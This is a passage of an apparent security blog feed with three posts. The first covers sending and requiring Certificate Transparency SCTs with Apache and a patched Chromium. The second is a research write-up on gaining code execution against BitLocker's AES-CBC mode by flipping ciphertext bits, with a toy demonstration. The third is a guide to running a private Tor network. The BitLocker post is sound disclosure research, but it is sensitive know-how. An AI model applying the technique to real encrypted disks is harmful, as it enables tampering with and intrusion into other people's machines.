<p><em>Now, to be clear, CT is in its infancy.  So things will get easier.  In fact right now CT is only deployed to enable Extended Validation indicators in Chrome - and for nothing else.  So don't take this blog post as a critique of the system. Rather take it as jumping ahead a couple years and proofing out tomorrow's protection mechanisms, today.</em></p>

<h2>Let's log a cert.</h2>

<p>First off, before you can actually deliver SCTs to your clients, you have to get an SCT - so you have to log your cert.  There are several <a href="http://www.certificate-transparency.org/known-logs">functional, operating logs</a>.  Submitting a certificate is not done through a web form, but rather an API, as specified in <a href="http://tools.ietf.org/html/rfc6962#section-4.1">the RFC</a>.</p>

<p>To help with this, I created a tiny <a href="https://github.com/tomrittervg/ct-tools/blob/master/submit-cert.py">python script</a>.  You will need to open your site in your browser first, and download your certificate and the entire certificate chain up to a known root.  Store them as Base64-encoded .cer or .pem files.  They should be ASCII and start with "-----BEGIN CERTIFICATE-----".</p>

<p>Now call submit-cert.py with the certificate chain, in order, starting with the leaf.  You can specify a specific log to submit to, or you can just try them all. No harm in that!</p>

<pre>
./submit-cert.py --cert leaf.cer --cert intermediate1.cer --cert intermediate2.cer --cert root.cer
rocketeer
        Timestamp 1410307847307
        Signature BAMARzBFAiEAzNhW8IUPJY1c8vbLDAmufuppc9mYdBLbtSwTHLrnklACID5iG8kafP8pcxny1yKciiewhg8VRybMR4h3wJlTV3s5
Error communicating with izenpen
certly
        Timestamp 1424321473254
        Signature BAMARzBFAiA091WNEs3R/SWVjRaAlpwUpY0l/YYgUH3sMYBlI4XB9AIhAPVMyODwhig48IpE0EJgzKpdAi/iorBUIuy1qH4qrO5g
Error communicating with digicert
aviator
        Timestamp 1406484668045
        Signature BAMARzBFAiEA2TVxYDf30ndQlANozAp+HVQ1IFyfGRjsZPa3TZWeeRcCIFFDpPnHQbxfhXQ7bXtueAFiiGG3HfvWqFnc9L+M/+pt
pilot
        Timestamp 1406495947353
        Signature BAMARzBFAiEAvckWLUX2H/p1dPbZmn/kaxeAbAEqehQYsgscJMzrqNYCIGGQaJ0MtG8Z13+nk2sstFAwqN+t8wsAEqNdZZmrL0e0
</pre>

<p>You can see that we had a few errors: we couldn't submit it to the two CA-run logs: Digicert and Izenpen. I think one of them is restricting IPs and the other may not be accepting the particular root I'm issued off of. No worries though, we got success responses from all 3 Google logs and the other independent log, certly. You'll be able to see your certificates within 24 hours at <a href="http://ctwatch.net/">ctwatch.net</a> which is a monitor and nice front-end for querying the logs. (The only one I'm aware of actually.)</p>

<p><small>Something else you might notice if you examine things carefully is that your certificate is probably already in the Google logs.  (Check <a href="http://ctwatch.net/">ctwatch.net</a> for your cert now.) They pre-seeded their logs with, as far as I can tell, every certificate they've seen on the Internet.</small></p>
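<p>For the curious, the API the script wraps is just one HTTP POST per log, as laid out in <a href="http://tools.ietf.org/html/rfc6962#section-4.1">section 4.1 of the RFC</a>. Here's a minimal sketch in Python using only the standard library - my own illustration of the protocol, not the actual code of submit-cert.py (the helper names are mine):</p>

```python
import base64
import json
import urllib.request

def pem_to_b64der(pem_text):
    """Strip the PEM armor lines, leaving the base64-encoded DER body."""
    return "".join(line.strip() for line in pem_text.splitlines()
                   if line.strip() and not line.startswith("-----"))

def submit_chain(log_url, pem_certs):
    """POST a chain (leaf first) to a log's add-chain endpoint.
    The JSON response carries the SCT fields: sct_version, id,
    timestamp, and signature."""
    body = json.dumps({"chain": [pem_to_b64der(p) for p in pem_certs]}).encode()
    req = urllib.request.Request(
        log_url.rstrip("/") + "/ct/v1/add-chain",
        data=body,
        headers={"Content-Type": "application/json"})
    with urllib.request.urlopen(req) as resp:
        return json.load(resp)
```

<p>The timestamp and signature in that response are exactly the values the script prints for each log.</p>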

<h2>Let's get OpenSSL 1.0.2</h2>

<p>Wait, what?  Yea, before we can configure Apache to send the TLS extension, we need to make sure our TLS library <em>supports</em> the extension, and in OpenSSL's case, that means 1.0.2.  Fortunately, gentoo makes this easy.  In general, this entire process is not going to be that difficult if you're already running Apache 2.4 on gentoo - but if you're not... it's probably going to be pretty annoying.</p>

<h2>Let's Configure Apache</h2>

<p>Okay, now that we're using OpenSSL 1.0.2, we need to configure our webserver to send the TLS extension.  This is really where the bleeding edge starts to happen.  I'm not aware of any way to do this for nginx or really for anything but Apache.  <s>And for Apache, the code isn't even in a stable release, it's in <a href="https://httpd.apache.org/docs/trunk/mod/mod_ssl_ct.html">trunk</a>. (And it's not that well tested.) But it does exist, thanks to the efforts of <a href="http://emptyhammock.blogspot.com/">Jeff Trawick</a>.</s></p>

<p><s>So if you're willing to compile Apache yourself, you can get it working.  You don't have to compile trunk, you can instead patch 2.4 and then compile the module specifically. I discovered that it's pretty easy to automatically add patches to a package in gentoo thanks to <tt>/etc/portage/patches</tt> so that's even better! (For me anyway.)</s></p>

<p><s>The two patches you will need for Apache 2.4 I have <a href="https://github.com/tomrittervg/ct-tools/blob/master/apache-0001-ct-support.patch">here</a> and <a href="https://github.com/tomrittervg/ct-tools/blob/master/apache-0002-add-mod_ssl_openssl.patch">here</a>.  These patches (and this process) are based off <a href="https://github.com/trawick/ct-httpd/tree/master/src/2.4.x">Jeff's work</a> but be aware his repo's code is out of date in comparison with httpd's trunk, and his patch didn't work for me out of the box. Jeff updated his patch, and it works out-of-the-box (for me).  You can <a href="https://github.com/trawick/ct-httpd/tree/master/src/2.4.x">find it here</a>.</s></p>

<p><strong>As of Apache 2.4.20, you no longer need to patch Apache!  Thanks Jeff! For more information <a href="https://github.com/trawick/ct-httpd/tree/master/src/2.4.x">check out his github repo</a>.</strong></p>

<p>You do need to compile the Apache module.  For that, you need to go <a href="https://github.com/trawick/ct-httpd/tree/master/src/2.4.x#the-module-itself">check out httpd's trunk</a>.  After that you need to build the module which is quite simple. There's a sample command right after the checkout instructions, for me it was:</p>

<pre>cd modules/ssl
apxs -ci -I/usr/include/openssl mod_ssl_ct.c ssl_ct_util.c ssl_ct_sct.c ssl_ct_log_config.c</pre>

<p>This even goes so far as to install the module for you!  Let's go configure it. I wanted to be able to control it with a startup flag, so where the modules were loaded I specified:</p>

<pre>
&lt;IfDefine SSL_CT>
LoadModule ssl_ct_module modules/mod_ssl_ct.so
&lt;/IfDefine>
</pre>

<p>Now if you <a href="https://httpd.apache.org/docs/trunk/mod/mod_ssl_ct.html">read the module documentation</a> you discover this module does <em>a lot</em>.  It uses the command line tools from the <a href="https://code.google.com/p/certificate-transparency/">certificate-transparency project</a> to automatically submit your certificates, it handles proxies, it does auditing... It's complicated.  Instead, we want the simplest thing that works - so we're going to ignore all that functionality and just configure it statically using SCTs we give it ourselves.  </p>

<p><s>I have two VHosts running (which actually <a href="https://issues.apache.org/bugzilla/show_bug.cgi?id=57553">caused a bug</a>, pay attention to that if you have multiple VHosts)</s> - This is fixed! I configured it like this:</p>

<pre>
&lt;IfDefine SSL_CT>
CTSCTStorage   /run/ct-scts

CTStaticSCTs /etc/apache2/ssl/rittervg-leaf.cer /etc/apache2/ssl/rittervg-scts
CTStaticSCTs /etc/apache2/ssl/cryptois-leaf.cer /etc/apache2/ssl/cryptois-scts
&lt;/IfDefine>
</pre>

<p>The <tt>CTSCTStorage</tt> directive is required; it's a working directory where the module stores some temporary files. The <tt>CTStaticSCTs</tt> directive tells it to look in the given directory for files ending in <tt>.sct</tt> containing SCTs for that certificate.</p>

<p>So we need to put our SCTs in that directory - but in what format?  It's not really documented, but it's the exact SCT structure that's going to go into the extension.  You'd think <em>that</em> structure would be documented in the RFC - in fact you'd probably expect it to be right <a href="http://tools.ietf.org/html/rfc6962#section-3.3">here, where they say <tt>SerializedSCT</tt></a>... but no dice, that's not defined. Instead you can find it <a href="http://tools.ietf.org/html/rfc6962#section-3.2">here</a> but it's not really apparent. I figured it out mostly by reading Chromium's source code. </p>

<p>To aid you in producing these .sct files, I again <a href="https://github.com/tomrittervg/ct-tools/blob/master/write-sct.py">wrote a little script</a>.  You give it the log name, the timestamp, and the signature that you got from the prior script you ran, and it outputs a small little binary file. (You can output it to a file, or output it in base64 for easy copy/pasting between terminals.)</p>
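<p>If you're wondering what actually goes into those bytes, here's a sketch of the packing - my own illustration of the v1 SCT structure from the RFC, not the actual code of write-sct.py:</p>

```python
import base64
import struct

def serialize_sct(log_id, timestamp_ms, signature_b64):
    """Pack a v1 SCT into the TLS wire format the .sct files use:
    version(1 byte) || log_id(32 bytes) || timestamp(8 bytes, big-endian
    milliseconds) || extensions length(2 bytes, zero here) || the
    digitally-signed signature blob.  The base64 'Signature' printed by
    submit-cert.py already carries the hash/signature algorithm bytes and
    its own length prefix, so it's appended as-is."""
    assert len(log_id) == 32  # the SHA-256 hash of the log's public key
    return (b"\x00"                            # sct_version: v1
            + log_id
            + struct.pack(">Q", timestamp_ms)  # ms since the epoch
            + b"\x00\x00"                      # no extensions
            + base64.b64decode(signature_b64))
```

<p>Concatenate those pieces, write them to a <tt>.sct</tt> file, and you have what the module sticks into the TLS extension verbatim.</p>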

<p>With these .sct files present, you can fire up Apache (if necessary passing <tt>-D SSL_CT</tt>, perhaps in <tt>/etc/conf.d/apache</tt>) and see if it starts up!  If it does, visit your site in Chrome (which will send the CT TLS Extension) and see if you can load your site.  If you can, look in the Origin Information Bubble and see if you have transparency records:</p>

<p class="center"><img src="/resources/requirect/requirect-oib.png"></p>

<p>Hopefully you do, and you can click in to see it:</p>

<p class="center">
  <img src="/resources/requirect/requirect-scts.png">
  <br />
  <small><em>"From an unknown log" appears because <a href="http://www.certificate-transparency.org/known-logs">Rocketeer and Certly are still pending approval and inclusion</a></em></small>
</p>

<p><small>It's a <a href="https://twitter.com/sleevi_/status/568638340641091584">known issue</a> that you don't get the link or SCT viewer on Mac, but it will say "and is publicly auditable".</small></p>

<h2>Requiring Certificate Transparency</h2>

<p>That's all well and good and took way more work than you expected, but this only <em>sends</em> CT information, it doesn't <em>require it</em>.  For that we need to go, edit, and compile another giant project: Chromium.</p>

<p><strong>Wait seriously? You're going to go patch Chromium?</strong></p>

<p>Hell yea.  Like I said in the beginning: requiring CT, today, is a <em>proof of concept</em> of something from the future.  We may get to the day where Chrome requires CT for all certificates - both EV and DV.  But not yet, and not for several years at least.  Today, we need to patch it.  But rather than patching it to require CT for every domain on the internet - that would break, AFAIK, every single domain except my two and <a href="https://embed.ct.digicert.com/">Digicert's test site</a> - instead  we're making it a directive in HSTS that a site operator can specify.  </p>

<p>Building Chromium is not trivial.  Unless you're on gentoo in which case it's literally how you install the browser.  I worked off Chromium 42.0.2292.0 which is already out of date since I started this project 10 days ago.  But whatever.  I used the manual <a href="https://www.gentoo.org/doc/en/handbook/2004.2/handbook-x86.xml?part=3&chap=6">ebuild commands</a> to pause between the unpack and compile stages to test my edits - unless you use that exact version, you'll almost certainly not get a clean apply of my patch.</p>

<p>The patch to chromium is <a href="https://github.com/tomrittervg/ct-tools/blob/master/chromium-0001-Support-requireCT-in-HSTS.patch">over here</a>, and it adds support for the HSTS directive <tt>requireCT</tt>. If present, it will fail a connection to any site that it has noted this for, unless it supplies SCTs in either the TLS Extension, the Certificate Extension, or an OCSP Staple.  (The last two are untested, but probably work.)</p>
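<p>Concretely, a site opts in by appending the directive to its existing HSTS header, something like this (the <tt>requireCT</tt> token is what my patch parses - it's not a standard - shown alongside the standard <tt>max-age</tt> and <tt>includeSubDomains</tt> directives):</p>

```
Strict-Transport-Security: max-age=31536000; includeSubDomains; requireCT
```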

<p><a name="ctrequiredfailurescreenshot"></a>Here's what it looks like when it fails:</p>

<p class="center"><img src="/resources/requirect/requirect-fail.png"></p>

<p>And that, I think, is kinda cool.</p>
]]></description>
	</item>

	<item>
		<guid>http://ritter.vg/blog-code_execution_bitlocker.html</guid>
		<title>Code Execution In Spite of BitLocker</title>
		<pubDate>8 Dec 2014 09:02:23 EST</pubDate>
		<description><![CDATA[
<p>Disk Encryption is “a litany of difficult tradeoffs and messy compromises” as our good friend and mentor Tom Ptacek put it in <a href="http://sockpuppet.org/blog/2014/04/30/you-dont-want-xts/">his blog post</a>.  That sounds depressing, but it’s pretty accurate - trying to encrypt an entire hard drive is riddled with constraints.  For example:</p>

<ul>
  <li>Disk Encryption must be really, really fast.  Essentially, if the crypto happens slower than the disk read speed (said another way, if the CPU is a bottleneck) - your solution is untenable to the mass market</li>
  <li>It must support random read and write access - any sector may be read at any time, and any sector may be updated at any time</li>
  <li>You really need to avoid updating multiple sectors for a single write - if power is lost during the operation, the inconsistencies will not be able to be resolved easily, if at all</li>
  <li>People expect hard disks to provide roughly the amount of advertised space. Stealing significant amounts of space for ‘overhead’ is not feasible. (This goes doubly so if encryption is applied after operating system installation - there may not be space to steal!)</li>
</ul>

<p>The last two constraints mean that the ciphertext must be the exact same size as the plaintext.  There’s simply no room to store IVs, nonces, counters, or authentication tags.  And without any of those things, there’s no way to provide cryptographic authentication in any of the common ways we know how to provide it.  No HMACs over the sector and no room for a GCM tag (or OCB, CCM, or EAX, all of which expand the message).  Which brings us to…</p>

<h3 id="poor-mans-authentication">Poor-Man’s Authentication</h3>

<p>Because of the constraints imposed by the disk format, it’s extremely difficult to find a way to correctly authenticate the ciphertext.  Instead, disk encryption relies on ‘poor-man’s authentication’.  </p>

<blockquote>
  <p>The best solution is to use poor-man’s authentication: encrypt the data and trust to the fact that changes in the ciphertext do not translate to semantically sensible changes to the plaintext. For example, an attacker can change the ciphertext of an executable, but if the new plaintext is effectively random we can hope that there is a far higher chance that the changes will crash the machine or application rather than doing something the attacker wants.</p>

  <p>We are not alone in reaching the conclusion that poor-man’s authentication is the only practical solution to the authentication problem. All other disk-level encryption schemes that we are aware of either provide no authentication at all, or use poor-man’s authentication. To get the best possible poor-man’s authentication we want the BitLocker encryption algorithm to behave like a block cipher with a block size of 512–8192 bytes. This way, if the attacker changes any part of the ciphertext, all of the plaintext for that sector is modified in a random way. </p>
</blockquote>

<p>That excerpt comes from an excellent paper by <a href="http://css.csail.mit.edu/6.858/2012/readings/bitlocker.pdf">Niels Ferguson of Microsoft</a> in 2006 explaining how BitLocker works.  The property of changing a single bit, and it propagating to many more bits, is <a href="http://en.wikipedia.org/wiki/Confusion_and_diffusion">diffusion</a> and it’s actually a design goal of block ciphers in general.  When talking about disk encryption in this post, we’re going to use diffusion to refer to how much changing a single bit (or byte) on an encrypted disk affects the resulting plaintext.</p>

<h3 id="bitlocker-in-windows-vista--7">BitLocker in Windows Vista &amp; 7</h3>

<p>When BitLocker was first introduced, it operated in AES-CBC with something called the Elephant Diffuser.  The BitLocker paper is an excellent reference  both on how Elephant works, and why they created it.  At its heart, the goal of Elephant is to provide as much diffusion as possible, while still being highly performant.</p>

<p>The paper also includes Microsoft’s Opinion of AES-CBC Mode used by itself. I’m going to just quote:</p>

<blockquote>
  <p>Any time you want to encrypt data, AES-CBC is a leading candidate. In this case it is not suitable, due to the lack of diffusion in the CBC decryption operation. If the attacker introduces a change d in ciphertext block i, then plaintext block i is randomized, but plaintext block i + 1 is changed by d. In other words, the attacker can flip arbitrary bits in one block at the cost of randomizing the previous block. This can be used to attack executables. You can change the instructions at the start of a function at the cost of damaging whatever data is stored just before the function. With thousands of functions in the code, it should be relatively easy to mount an attack.</p>

  <p>The current version of BitLocker [Ed: BitLocker in Vista and Windows 7] implements an option that allows customers to use AES-CBC for the disk encryption. This option is aimed at those few customers that have formal requirements to only use government-approved encryption algorithms. Given the weakness of the poor-man’s authentication in this solution, we do not recommend using it.</p>
</blockquote>

<h3 id="bitlocker-in-windows-8--81">BitLocker in Windows 8 &amp; 8.1</h3>

<p>BitLocker in Windows 8 and 8.1 uses AES-CBC mode, without the diffuser, by default.  It’s actually not even a choice, the option is entirely gone from the Group Policy Editor.  (There is a second setting that applies to only “Windows Server 2008, Windows 7, and Windows Vista” that lets you choose Diffuser.) Even using the commandline there’s no way to encrypt a new disk using Diffuser - Manage-BDE says “The encryption methods aes128_Diffuser and aes256_Diffuser are deprecated. Valid volume encryption methods: aes128 and aes256.”  However, we can confirm that the code to use Diffuser is still present - disks encrypted under Windows 7 with Diffuser continue to work fine on Windows 8.1.</p>

<p>AES-CBC is the exact mode that Microsoft considered (quoting from above) “unsuitable” in 2006 and “recommended against”.  They explicitly said “it should be relatively easy to mount an attack”.</p>

<p>And it is.  </p>

<p>As written in the Microsoft paper, the problem comes from the fact that an attacker can modify the ciphertext and perform very fine-grained modification of the resulting plaintext.  Flipping a single bit in a ciphertext block reliably scrambles the corresponding plaintext block in an unpredictable way (the rainbow block), and flips the exact same bit in the subsequent plaintext block (the red line):</p>

<p class="center"><img src="/resources/bitlocker1/cbc-edit.png" alt="CBC Mode Bit Flipping Propagation" /></p>

<p>This type of fine-grained control is exactly what Poor Man’s Authentication is designed to combat.  We want any change in the ciphertext to result in entirely unpredictable changes in the plaintext and we want it to affect an extremely large swath of data.  This level of fine-grained control allows us to perform targeted scrambling, but more usefully, targeted bitflips.</p>
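<p>You can watch this propagation happen in a few lines of Python. The block 'cipher' below is a hash-based stand-in, not AES - only the structure of CBC decryption (P_i = D(C_i) XOR C_(i-1)) matters for the demonstration:</p>

```python
import hashlib

BS = 16  # AES block size in bytes

def D(block):
    """Stand-in for AES block *decryption*: any fixed, unpredictable
    function exhibits the CBC structure.  This is a hash, NOT a real cipher."""
    return hashlib.sha256(b"toy-key" + block).digest()[:BS]

def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def cbc_decrypt(iv, ct):
    """CBC decryption: P_i = D(C_i) XOR C_(i-1), with C_(-1) = IV."""
    pt, prev = b"", iv
    for i in range(0, len(ct), BS):
        block = ct[i:i+BS]
        pt += xor(D(block), prev)
        prev = block
    return pt

iv = bytes(BS)
ct = bytes(range(3 * BS))            # three arbitrary ciphertext blocks
good = cbc_decrypt(iv, ct)

tampered = bytearray(ct)
tampered[0] ^= 0x01                  # flip one bit in ciphertext block 0
bad = cbc_decrypt(iv, bytes(tampered))

assert bad[:BS] != good[:BS]         # plaintext block 0: scrambled (rainbow)
assert bad[BS] == good[BS] ^ 0x01    # block 1: the exact same bit flipped (red)
assert bad[BS+1:] == good[BS+1:]     # every later block: untouched
```

<p>One randomized block is the price of a surgical bit flip in the next one - exactly the trade Microsoft described back in 2006.</p>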

<p>But what bits do we flip?  If the disk is encrypted, don't we lack any idea of where anything interesting is stored?  Yes and no.  In our testing, two installations of Windows 8 onto identical machines put the system DLLs in identical locations.  This behavior is far from guaranteed, but if we do know where a file is expected to be, perhaps through educated guesswork and installing the OS on the same physical hardware, then we will know the location, the ciphertext, and the plaintext.  And at that point, we can do more than just flip bits, we can completely rewrite what will be decrypted upon startup.  This lets us do much more than what people have suggested around changing a branch condition: we just write arbitrary assembly code.  So we did.  Below is a short video that shows booting up a Virtual Machine with a normal, unmodified BitLockered disk on Windows 8, shutting it down and modifying the ciphertext on the underlying disk, starting it back up, and achieving arbitrary code execution.</p>

<div style="text-align:center">
  <a href="https://www.youtube.com/watch?v=BGxiJ8hpwvo">Visit the Youtube Video</a>
</div>

<p>This is possible because we knew the location of a specific file on the disk (and therefore the plaintext), calculated what ciphertext would be necessary to write out desired shellcode, and wrote it onto the disk. (The particular file we chose did move around during installation, so we did ‘cheat’ a little - with more time investment, we could change our target to a system dll that hasn’t been patched in Windows Updates or moved since installation.)  Upon decryption, 16 bytes were garbled, but we chose the position and assembly code carefully such that the garbled blocks were always skipped over.  To give credit where others have demonstrated similar work, this is actually the same type of attack that Jakob Lell demonstrated against <a href="http://www.jakoblell.com/blog/2013/12/22/practical-malleability-attack-against-cbc-encrypted-luks-partitions/">LUKS partitions last year</a>.  </p>

<h3 id="xts-mode">XTS Mode</h3>

<p>The obvious question comes up when discussing disk encryption modes: why not use XTS, a mode specifically designed for disk encryption and standardized and blessed by NIST?  XTS is used in LUKS and Truecrypt, and prevents targeted bitflipping attacks.  But it’s not perfect.  Let’s look at what happens when we flip a single bit in ciphertext encrypted using XTS:</p>

<p class="center"><img src="/resources/bitlocker1/xts-edit.png" alt="XTS Mode Bit Flipping Propagation" /></p>

<p>A single bit change completely scrambles the full 16 byte block of the ciphertext, there’s no control over the change.  That’s good, right?  It’s not bad, but it’s not as good as it could be.  Unfortunately, XTS was not considered in the original Elephant paper (it was relatively new in 2006), so we don’t have their thoughts about it in direct comparison to Elephant. But the authors of Elephant evaluated another disk encryption mode that had the same property:</p>

<blockquote>
  <p>LRW provides some level of poor-man’s authentication, but the relatively small block size of AES (16 bytes) still leaves a lot of freedom for an attacker. For example, there could be a configuration file (or registry entry) with a value that, when set to 0, creates a security hole in the OS. On disk the setting looks something like “enableSomeSecuritySetting=1”. If the start of the value falls on a 16-byte boundary and the attacker randomizes the plaintext value, there is a 2<sup>−16</sup> chance that the first two bytes of the plaintext will be 0x30 0x00 which is a string that encodes the ASCII value ’0’.</p>

  <p>For BitLocker we want a block cipher whose block size is much larger. </p>
</blockquote>

<p>Furthermore, they elaborate upon this in their <a href="http://csrc.nist.gov/groups/ST/toolkit/BCM/documents/comments/XTS/collected_XTS_comments.pdf">comments to NIST on XTS</a>, explicitly calling out the small amount of diffusion.  A 16-byte scramble is pretty small.  It's only 3-4 assembly instructions.  To see how XTS's diffusion compares to Elephant's, we modified a single bit on the disk of a BitLockered Windows 7 installation that corresponded to a file of all zeros.  The resulting output shows that 512 bytes (the smallest sector size in use) were modified:</p>

<p class="center"><img src="/resources/bitlocker1/elephant.png" alt="Elephant Bit Flipping Propagation" /></p>

<p>This amount of diffusion is obviously much larger than 16 bytes.  It’s also not perfect - a 512 byte scramble, in the right location, could very well result in a security bypass.  Remember, this is all ‘Poor Man’s Authentication’ - we know the solution is not particularly strong, we’re just trying to get the best we can.  But it’s still a lot harder to pop calc with.</p>

<h3 id="conclusion">Conclusion</h3>

<p>From talking with Microsoft about this issue, one of the driving factors in this change was performance. Indeed, when BitLocker first came out and was documented, the paper spends a considerable amount of focus on evaluating algorithms based on cycles/byte.  Back then, there were no AES instructions built into processors - today there are, and it has likely shifted the bulk of the workload for BitLocker onto the Diffuser.  And while we think of computers as becoming more powerful since 2006 - tablets, phones, and embedded devices are not the ‘exception’ but a major target market.</p>

<p>Using Full Disk Encryption (including BitLocker in Windows 8) is clearly better than not - as anyone who’s had a laptop stolen from a rental car knows.  Ultimately, I’m extremely curious what requirements the new BitLocker design had placed on it.  Disk Encryption is hard, and even XTS (standardized by NIST) has significant drawbacks.  With more information about real-world design constraints, the cryptographic community can focus on developing something better than Elephant or XTS.</p>

<p>I’d like to thank Kurtis Miller for his help with Windows shellcode, Justin Troutman for finding relevant information, Jakob Lell for beating me to it by a year, DaveG for being DaveG, and the MSRC.</p>

<p><em>This post originally appeared on the <a href="https://cryptoservices.github.io/fde/2014/12/08/code-execution-in-spite-of-bitlocker.html">Cryptography Services</a> blog.</em></p>
]]></description>
	</item>

	<item>
		<guid>http://ritter.vg/blog-run_your_own_tor_network.html</guid>
		<title>Run Your Own Tor Network</title>
		<pubDate>17 Nov 2014 13:00:23 EST</pubDate>
		<description><![CDATA[
<p>Tor is interesting for a lot of reasons.  One of the reasons it's interesting is that the network itself operates, at its core, by mutually distrusting Directory Authorities.  These Directory Authorities are run by members of the Tor Project and by trusted outside individuals/groups, such as <a href="https://riseup.net">RiseUp.net</a> and <a href="http://ccc.de/">CCC.de</a>.  A Directory Authority votes on its view of the network, and collects the votes of the other Directory Authorities.  If the majority of authorities vote for something (the inclusion of a relay, marking it as 'Bad', whatever) - it <a href="https://gitweb.torproject.org/tor.git/blob/f94e5f2e5212034cb8b2666716eeaa61e874065b:/src/or/dirvote.c#l1512" title="Here we're determining whether or not a relay will get certain flags.">passes the vote</a>.</p>

<p>This infrastructure design is very interesting.  The only thing that comes close, that I can think of, is the Bitcoin blockchain or Ripple's ledgers.  Compare it to some of the other models:
<ul>
    <li>Relying on an individual to make trust decisions given a database of data and a little context.  (Think PGP Web of Trust.)
    <li>Relying on a single party to sign everything and adjudicate.  (Think country-code TLDs, or even Verisign operating .com)
    <li>Relying on a number of trusted parties who operate independently. (Think Certificate Authorities, any of whom can certify any domain on the web.)
    <li>Relying on a single operator to run a service. (Think Whisper Systems' RedPhone/TextSecure/Signal.)
</ul></p>

<p>I think the Directory Authority model is pretty elegant.  Relying on the user to make trust decisions doesn't work out so well. A single trusted server, or set of servers, administered by one organization is at risk of a complete compromise in one fell swoop.  But separately managed servers that operate by majority vote mitigate many concerns.</p>

<p><small>If one were to take it a step further, one would ensure that no majority of the servers were running the same software stack, to reduce the possibility of a single bug affecting a majority. This is a poor example, because tor relies on OpenSSL and it's not easily swapped out - but the majority of DirAuths had to upgrade when Heartbleed hit. Going even further - there is only one implementation of the DirAuth voting protocol in the tor daemon itself. Certificate Transparency has <a href="https://groups.google.com/forum/#!topic/certificate-transparency/uRemlJKb284">at least</a> <a href="https://github.com/google/certificate-transparency">two different implementations</a> for comparison.</small></p>

<p>But, to be clear - locking a user into a trust decision, even a consensus of mutually distrusting authorities, is still a bad thing. If tor only allowed you to use the official Tor Network - that would be bad.  We should be able to change who we trust at any time - Moxie dubs it <a href="http://www.thoughtcrime.org/blog/ssl-and-the-future-of-authenticity/">Trust Agility</a>.  It's worth noting that the Tor Network has some amount of trust agility, but it's not perfect. If I want to change the Directory Authorities that I trust I can technically do so, but I will no longer be able to use the official Tor Network because those few thousand relays 'belong' to it, and one cannot set up a network that includes them. (There's been some thought that one might be able to, but it would be an unsupported hack, liable to break.)  It would be interesting if the codebase could evolve such that a tor node may belong to more than one network at a time. Then an alternate network could flourish, and relay operators could join multiple networks to support other administrative boundaries.</p>

<h3>Can I run a tor network?</h3>

<p>Tor is open source.  There aren't a lot of instructions for actually deploying the Directory Authorities, but what is there is not bad.  And you can absolutely run your own tor network.  There are actually <em>three different ways</em> to do it.  <a href="https://gitweb.torproject.org/chutney.git">Chutney</a> and <a href="https://shadow.github.io/">shadow</a> are tools designed mostly for setting up test networks for running experiments in laboratory conditions.  Shadow is specifically designed for running bandwidth tests across large-sized tor networks.  So if you want to model a tor network running 50,000 nodes - shadow's your huckleberry.</p>

<p>But if you want to deploy as authentic a tor network as possible, do it manually.  It's not all that hard.  And if you want to conduct research on tor's protocols, it's a great way to do it safely, instead of <a href="https://blog.torproject.org/blog/tor-security-advisory-relay-early-traffic-confirmation-attack">actively de-anonymizing real users in the wild</a>. Here are the approximate steps:</p>

<dl>
    <dt>Configure and compile tor, as normal, on all your boxes.</dt>
    <dd>If you're going to run multiple daemons per machine, you may want to use <tt>./configure --prefix=/directory/tor-instance-1</tt> to segment them.<p></p></dd>
    
    <dt>Start configuring a few Directory Authorities.</dt>
    <dd>This step is generating the keys for them and the DirServer lines.  Run <tt>tor-gencert</tt> to generate an identity key. Then run <tt>tor --list-fingerprint</tt>.  Create your DirServer lines like <tt>DirServer &lt;nickname&gt; orport=&lt;port&gt; v3ident=&lt;fingerprint from authority_certificate, no spaces&gt; &lt;ip&gt;:&lt;port&gt; &lt;fingerprint from --list-fingerprint in ABCD EF01 format&gt;</tt>.  These DirServer lines are what put you onto an alternate tor network instead of the official one.  You need one line per Directory Authority, and all DirServer lines need to be in the configuration of every DirAuth, Node, and Client you want to talk to this network.<p></p></dd>
    
    <dt>Finish the Directory Authorities' configuration.</dt>
    <dd>You should set <tt>SOCKSPort</tt> to 0, <tt>ORPort</tt> to something, and <tt>DirPort</tt> to something.
        <p>You need to set <tt>AuthoritativeDirectory</tt> and <tt>V3AuthoritativeDirectory</tt>.  You can also set <tt>VersioningAuthoritativeDirectory</tt> along with <tt>RecommendedClientVersions</tt> and <tt>RecommendedServerVersions</tt> - why not.  Perhaps you want to copy <tt>ConsensusParams</tt> out of a recent consensus, also.  If you're going to run multiple tor daemons off a single IP address, you should set <tt>AuthDirMaxServersPerAddr 0</tt> (0 is unlimited, default is two servers per IP.)</p>
        <p>You will also (probably) want to lower the voting times, so you can generate a consensus quicker.  I'd suggest, to start off with, <tt>V3AuthVotingInterval 5 minutes</tt>, <tt>V3AuthVoteDelay 30 seconds</tt>, and <tt>V3AuthDistDelay 30 seconds</tt>. You can also set <tt>MinUptimeHidServDirectoryV2</tt> to something like <tt>1 hour</tt>.</p></dd>
        
    <dt>Start up your Directory Authorities.</dt>
    <dd>They should all be running, and you should see stuff like 'Time to vote' and 'Uploaded a vote to...' in notices.log.
        <p>You will also see <em>Nobody has voted on the Running flag. Generating and publishing a consensus without Running nodes would make many clients stop working. Not generating a consensus!</em>  This is normal.  If <tt>TestingAuthDirTimeToLearnReachability</tt> is not set (and it's not) - a Directory Authority will wait 30 minutes before voting to consider a relay to be Running.  You should either wait 30 minutes and be patient, or set <tt>AssumeReachable</tt> to skip the 30 minute wait. They will shortly begin generating a consensus you can see at <tt>http://&lt;ip&gt;:&lt;port&gt;/tor/status-vote/current/consensus</tt></p></dd>
        
    <dt>Start adding more nodes.</dt>
    <dd>Configure some Exit and Relay nodes (and optionally Bridges).  For each node, you will need to include the <tt>DirServer</tt> lines in its configuration.  If you're running your nodes in the same /16, you will also need to set <tt>EnforceDistinctSubnets 0</tt>.
        <p>There is one other thing you will need to set for the first few nodes though: <tt>AssumeReachable 1</tt>.  This is because if the consensus has no Exit Nodes, a <a href="https://trac.torproject.org/projects/tor/ticket/13718">subtle bug</a> will manifest, and nodes will get in a loop and will not upload their descriptors to the Directory Authorities for inclusion in the consensus. By setting <tt>AssumeReachable</tt>, we skip the test.  (The other option is to set up one of your Directory Authorities as an Exit node.)</p></dd>
        
    <dt>Run Depictor.</dt>
    <dd><a href="https://gitweb.torproject.org/depictor.git">Depictor</a> is a service that monitors the Directory Authorities and generates a <a href="https://consensus-health.torproject.org/">pretty website</a> that will give you a lot of info about your network. <small>(Full disclosure, I wrote depictor, cutting over an older java-based tool called 'Doctor' to python)</small></dd>
        
</dl>	
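
<p>As a concrete (and entirely hypothetical) example, the options above combine into a torrc roughly like this - every nickname, IP, port, and fingerprint is a placeholder you'd substitute with your own values:</p>

<blockquote><pre>
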